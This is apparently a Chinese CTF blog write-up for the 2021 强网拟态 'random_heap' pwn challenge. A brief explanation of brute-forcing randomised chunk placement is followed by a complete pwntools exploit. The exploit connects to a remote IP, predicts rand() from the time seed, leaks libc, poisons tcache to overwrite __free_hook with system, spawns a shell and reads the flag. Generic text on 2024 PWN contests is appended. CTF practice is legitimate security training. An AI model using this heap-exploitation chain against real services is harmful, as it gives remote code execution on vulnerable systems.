2021强网拟态 pwn random_heap

在这里插入图片描述
题目的难度在于他chunk分配的地址是随机的。
如何能破掉这种随机。
我采取的方法是硬爆破,直到爆破到我想要的那种形式,我们加以利用。
爆破的过程中可以稍加采取限制,减少爆破时间。

# -*- coding: utf-8 -*-
from pwn import*
from ctypes import *

#context.log_level='debug'
context.arch='amd64'
context.os = "linux"
#context.terminal = ["tmux", "splitw", "-h"]

local = 0
if local:
    r = process('./random_heap')
else:
    r = remote("124.71.140.198", 49153)
    

sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()


#libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.2_amd64/libc.so.6")
libc = ELF("./libc-2.27.so")
libcc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")

def debug():
    gdb.attach(r)
    pause()

def lg(s,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))

def add(index, size):
    sla("Your choice: ", "1")
    sla("Index: ", str(index))
    sla("Size: ", str(size))


def edit(index, content):
    sla("Your choice: ", "2")
    sla("Index: ", str(index))
    sla("Content: ", content)


def show(index):
    sla("Your choice: ", "3")
    sla("Index: ", str(index))


def delete(index):
    sla("Your choice: ", "4")
    sla("Index: ", str(index))

v0 = libcc.time(0)
libcc.srand(v0)

for i in range(64):
    add(i, 0x80)
    a = libcc.rand()

for i in range(64):
    delete(i)

s = ""

for i in range(64):
    show(i)
    s = ru("\n")
    if len(s) > 15 and s[14] == '\x7f':
        break

malloc_hook = (u64(s[9:15].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym["__free_hook"]
system_addr = libc_base + libc.sym["system"]
lg("libc_base", libc_base)

for i in range(64):
    edit(i, p64(free_hook))

ss = ['a','a','a','a','a','a','a','a','a','a','a','a','a','a','a','a','a','a']

for i in range(63):
    add(i, 0x80)
    edit(i, '/bin/sh\x00')
    a = libcc.rand() & 0xf
    print int(a)
    if ss[int(a)] == 'b':
        edit(i, p64(system_addr))
        break
    ss[int(a)] = "b"

print ss
delete(0)

sl("cat flag")
    
r.interactive()

### 关于2024年PWN比赛 #### 比赛概述 “杯”全国网络安全挑战赛是由中国络空间安全协会主办的全国性竞赛,旨在选拔和培养网络安全人才[^1]。该赛事涵盖了多种类型的网络安全竞赛项目,其中包括PWN比赛。 #### PWN比赛简介 PWN比赛是一种特定类型的CTF(Capture The Flag)竞赛模式之一。CTF起源于1996年的DEFCON全球黑客大会,已成为全球范围内流行的网络安全竞赛形式[^2]。PWN比赛主要侧重于漏洞挖掘与利用,参赛队伍需展示如何突破给定的目标系统或应用的安全防护机制。 #### 2024年PWN比赛详情 目前官方尚未公布具体的2024年PWN比赛细节。通常情况下,“杯”的活动安排会在官方站上提前发布通知,并提供详细的日程表以及报名指南。建议密切关注主办方发布的最新消息以获取最准确的比赛时间和规则说明。 #### 如何准备参加PWN比赛 为了更好地参与到此类比赛中去,选手应当掌握一系列必要的技能和技术: - **逆向工程**:理解二进制文件结构及其工作原理。 - **漏洞分析**:识别软件中的潜在缺陷并评估其可利用程度。 - **编程能力**:熟练运用C/C++、Python等语言编写高效可靠的工具脚本。 - **操作系统内核知识**:熟悉Linux/Windows系统的内部运作流程。 - **Web安全基础**:了解常见的Web应用程序攻击面如SQL注入、XSS跨站脚本等。 对于有兴趣加入这项高水平对抗性演练的朋友来说,平时多加练习是非常重要的。可以通过在线平台上的模拟环境来积累实战经验,比如pwnable.kr 或者 HackTheBox。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值